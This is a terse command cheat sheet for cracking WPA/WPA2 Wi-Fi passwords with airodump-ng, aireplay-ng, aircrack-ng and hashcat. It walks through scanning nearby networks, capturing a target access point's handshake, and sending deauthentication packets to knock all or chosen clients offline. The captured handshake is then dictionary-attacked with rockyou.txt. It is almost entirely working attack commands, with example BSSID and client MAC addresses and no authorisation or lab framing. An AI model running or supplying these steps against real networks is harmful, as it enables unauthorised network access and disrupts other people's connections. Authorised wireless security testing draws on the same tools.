๐Ÿ” 1. Scan Available WiFi Networks

๐ŸŒ Scan all nearby WiFi networks

sudo airodump-ng mon0

๐Ÿ“ถ Scan only 2.4 GHz networks (802.11b/g)

sudo airodump-ng --band bg mon0

๐Ÿ“ก Scan only 5 GHz networks (802.11a)

sudo airodump-ng --band a mon0

๐Ÿ“‹ Band Option Summary

  • --band a โ†’ 5 GHz (802.11a)
  • --band b โ†’ 2.4 GHz (802.11b)
  • --band g โ†’ 2.4 GHz (802.11g)
  • --band bg โ†’ All 2.4 GHz (recommended)
  • --band abg โ†’ Both 2.4 GHz and 5 GHz

๐ŸŽฏ 2. Capture WPA/WPA2 Handshake

๐ŸŽฏ Start listening on target AP

# Replace <channel>, <BSSID>, and <output_filename>
sudo airodump-ng -c <channel> --bssid <BSSID> -w <output_filename> mon0

Example

# Capture handshake from AP on channel 36
sudo airodump-ng -c 36 --bssid A0:70:B7:2C:07:70 -w Tenda.captured mon0

๐Ÿ“ This starts focused packet capture. Keep this terminal open!


๐Ÿ’ฅ 3. Force Reconnection with Deauth Attack

๐Ÿ”„ Deauth all clients on the target AP

sudo aireplay-ng --deauth 10 -a <BSSID> mon0

๐ŸŽฏ Deauth a specific client only

# Replace <BSSID> and <Client_MAC>
sudo aireplay-ng --deauth 10 -a <BSSID> -c <Client_MAC> mon0

Example

# Deauth one device from the AP
sudo aireplay-ng --deauth 10 -a A0:70:B7:2C:07:70 -c 32:6D:90:EC:CF:A0 mon0

๐Ÿ“ Send multiple deauth packets to force reconnect and capture the 4-way handshake.


๐Ÿงช 4. Verify and Crack Handshake

๐Ÿ” Verify handshake with aircrack-ng

aircrack-ng Tenda.captured.cap -w rockyou.txt

๐Ÿ“Œ If a handshake is captured, it will be shown in the top-right during capture and crackable here.


๐Ÿ”„ Convert capture for Hashcat

hcxpcapngtool Tenda.captured.cap -o Tenda.hc22000

๐Ÿ”“ Crack handshake with Hashcat

hashcat -m 22000 Tenda.hc22000 rockyou.txt --show